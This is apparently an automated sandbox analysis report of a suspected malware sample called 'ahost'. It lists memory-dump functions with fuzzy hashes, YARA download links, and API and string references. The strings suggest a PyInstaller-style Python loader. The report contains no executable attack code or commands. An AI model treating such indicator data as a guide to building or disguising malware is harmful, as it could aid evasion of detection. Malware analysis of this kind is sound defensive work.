Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: D4C1CD726181E08BD289EA29E86947A73E1F78930DBD5406BEF87477C5C63CA414DB60

Function 00007FF7F91F2C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: b8523f2019a774ded17c65fdcf2a4fec6ad9ae4b0b8f2d829cd7e4582d46a88f
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: BFB1AC72D18B8985E7649F29E85022CBBB0E749B4CFA40535CB6D473D9EF29D441C7A0

Function 00007FF7F91FE5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: 7350b212780d8e0a911aea6a00bcd00a464fef4a69b22f5363e6a05176f74b98
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: 2281F572E0878946D775EF19B84037AAAA1FB85798F904235DBBD43BD9EE3CD4008B50

Function 00007FF7F9206488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
Instruction ID: 10b2743b5821b148e974e035e5a7a1398c9d4834646fb399b20da3486ffb3e49
Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
Instruction Fuzzy Hash: D361FB22E0C19246F7A4AE299C5827DE5A0BF40364F940339D77DC76EDDE6DE80087A0

Function 00007FF7F91F21D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: e7178ed7aeb3b87d7fd1622e87e40523d62aa3a96ab48f6c9cc0afe5e8b7749f
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 3A517372E1865582EB249F29E44022877B0EB99B6CF644531CF7D077D8EB3AE843C790

Function 00007FF7F91F19B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 75ec88ef8f85a7e98471ed9e571e782e4aa671b34f62f4c8155482695e19cffd
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: AC517336E1865586F7349F29E440228B3B0EB44B6CFA44135CB6D177D8EB7AE843C790

Function 00007FF7F91F1DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 05d9733782dcc976f735c6c08678861b851b69de7688aa35d2ee3324aab89e53
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: F8519136E1865A86F7359F28E440268B3B0EB44B5CF644235CF6D477D9EB3AE842C790

Function 00007FF7F91F1BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 5d6d023bdbc0fe1534c4be87b565172bb777e8c91143ebc0d88599c8a06cbca7
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 42519036E1865986F7349F29E484228A7B1EB44B5CFA44131CB7C177D8EB3AE843C790

Function 00007FF7F91F1FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: c1c2e0dd7090eea19c8485605ced6c0f4ce26ed69ff0260d9804d5abab504e7c
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 1E51A477E1865585EB249F28E84022977B0EB44B5CFA44531CB6D177ECEB3AEC42C790

Function 00007FF7F91F17B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: bd2678a70e456933a16807363aab63aa189ad23d97a762d84df54b4a5c32ba42
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: FF51BC36E1865982F7349F29E840268A3B1EB44B5CFA44135CB6C177DCEB3AE842C7D0

Function 00007FF7F91F5DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 18d41cf61ef01b45c6b0494f8d3117f7e38b379a3a3ec61455a6e326a79be0c9
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 1441EC62C1974E44FB515D281D04678DAA09F62BE8FD812F0CFB9533CBFD2E29478161

Function 00007FF7F91F9F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: 71bbb9e6909d8f3c540dd0bfadf3e940c67516b214d0ef767e740e938bfa5e7e
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 57410622B14A5982FF44DF2AED54169B3A1BB48FD4B899132DE2D97B98EE3CD4418340

Function 00007FF7F91F8154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction ID: da990d4cd3b4a39b4c3b296af8a18a08c356a97e02cb0f90357db829d8a4d8df
Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction Fuzzy Hash: 2B31E632B08B4541FB58AF257C4013DA5A5AB84BD4F844238EB7E93BD9EF3CD0019754

Function 00007FF7F92095E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 7f1995f2952faec891a77e68d61d7759d4006bcf30a61a58593f3332660e711a
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 0EF0C8717182568BFB989F68A84266977E0F7083C0F908479E69DC3B58CA3CC0618F54

Function 00007FF7F91ED37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: 729c1c330d77f8dfaa9247ca4c25568c3188f13eea0682bc1a7ffb80d83eeddf
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: 42A00165A0C80AD5EB95AF10BC90029A330BB50300B840031E02E820F89E2CA80493A1

Function 00007FF7F91E5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5830
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5842
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5879
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E588B
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58A4
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58B6
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58CF
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58E1
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58FD
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E590F
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E592B
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E593D
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5959
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E596B
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5987
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5999
GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E59B5
GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E59C7

Strings

PySys_GetObject, xrefs: 00007FF7F91E5E57, 00007FF7F91E5E79
Py_DecodeLocale, xrefs: 00007FF7F91E586F, 00007FF7F91E5891
PyMem_RawFree, xrefs: 00007FF7F91E5C8B, 00007FF7F91E5CAD
PyObject_GetAttrString, xrefs: 00007FF7F91E5D43, 00007FF7F91E5D65
PyUnicode_Replace, xrefs: 00007FF7F91E5FC7, 00007FF7F91E5FE9
PyConfig_SetString, xrefs: 00007FF7F91E5A35, 00007FF7F91E5A57
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7F91E5DCD, 00007FF7F91E5DEF
PyUnicode_DecodeFSDefault, xrefs: 00007FF7F91E5F0F, 00007FF7F91E5F31
PyConfig_SetWideStringList, xrefs: 00007FF7F91E5A63, 00007FF7F91E5A85
PyConfig_Read, xrefs: 00007FF7F91E59D9, 00007FF7F91E59FB
PyObject_Str, xrefs: 00007FF7F91E5D9F, 00007FF7F91E5DC1
Py_PreInitialize, xrefs: 00007FF7F91E594F, 00007FF7F91E5971
PyErr_Fetch, xrefs: 00007FF7F91E5ABF, 00007FF7F91E5AE1
PyModule_GetDict, xrefs: 00007FF7F91E5CB9, 00007FF7F91E5CDB
GetProcAddress, xrefs: 00007FF7F91E5858
Py_InitializeFromConfig, xrefs: 00007FF7F91E58F3, 00007FF7F91E5915
PyMarshal_ReadObjectFromString, xrefs: 00007FF7F91E5C5D, 00007FF7F91E5C7F
PyImport_AddModule, xrefs: 00007FF7F91E5BD3, 00007FF7F91E5BF5
Py_ExitStatusException, xrefs: 00007FF7F91E589A, 00007FF7F91E58BC
Py_IsInitialized, xrefs: 00007FF7F91E5921, 00007FF7F91E5943
PyRun_SimpleStringFlags, xrefs: 00007FF7F91E5DFB, 00007FF7F91E5E1D
PyUnicode_FromString, xrefs: 00007FF7F91E5F6B, 00007FF7F91E5F8D
PyErr_Print, xrefs: 00007FF7F91E5B49, 00007FF7F91E5B6B
Py_Finalize, xrefs: 00007FF7F91E58C5, 00007FF7F91E58E7
PyUnicode_AsUTF8, xrefs: 00007FF7F91E5EB3, 00007FF7F91E5ED5
PyUnicode_FromFormat, xrefs: 00007FF7F91E5F3D, 00007FF7F91E5F5F
PySys_SetObject, xrefs: 00007FF7F91E5E85, 00007FF7F91E5EA7
PyObject_CallFunctionObjArgs, xrefs: 00007FF7F91E5D15, 00007FF7F91E5D37
PyErr_NormalizeException, xrefs: 00007FF7F91E5AED, 00007FF7F91E5B0F
PyObject_SetAttrString, xrefs: 00007FF7F91E5D71, 00007FF7F91E5D93
PyErr_Clear, xrefs: 00007FF7F91E5A91, 00007FF7F91E5AB3
PyUnicode_Decode, xrefs: 00007FF7F91E5EE1, 00007FF7F91E5F03
Py_DecRef, xrefs: 00007FF7F91E5826, 00007FF7F91E5848
PyStatus_Exception, xrefs: 00007FF7F91E5E29, 00007FF7F91E5E4B
PyConfig_InitIsolatedConfig, xrefs: 00007FF7F91E59AB, 00007FF7F91E59CD
PyConfig_Clear, xrefs: 00007FF7F91E597D, 00007FF7F91E599F
PyImport_ExecCodeModule, xrefs: 00007FF7F91E5C01, 00007FF7F91E5C23
PyErr_Restore, xrefs: 00007FF7F91E5B77, 00007FF7F91E5B99
PyErr_Occurred, xrefs: 00007FF7F91E5B1B, 00007FF7F91E5B3D
PyImport_ImportModule, xrefs: 00007FF7F91E5C2F, 00007FF7F91E5C51
Failed to get address for %hs, xrefs: 00007FF7F91E5851
PyObject_CallFunction, xrefs: 00007FF7F91E5CE7, 00007FF7F91E5D09
PyConfig_SetBytesString, xrefs: 00007FF7F91E5A07, 00007FF7F91E5A29
PyEval_EvalCode, xrefs: 00007FF7F91E5BA5, 00007FF7F91E5BC7
PyUnicode_Join, xrefs: 00007FF7F91E5F99, 00007FF7F91E5FBB

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 8a7849a82723bfcecd497cad4d0fbcc695c858c574f06ec15a894f2eb5cd99b8
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: FC227564D0AB0792FFA5FF56BC245B8A271AF04745FC45035C83E826E8AF3DB55882A1

Function 00007FF7F91E81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F91E88A7,?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E821C

Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA

Strings

LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7F91E8363
%.*s, xrefs: 00007FF7F91E82FC
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7F91E8230
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7F91E828D
CreateDirectory, xrefs: 00007FF7F91E836C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7F91E82C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7F91E81F3
\, xrefs: 00007FF7F91E8251

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
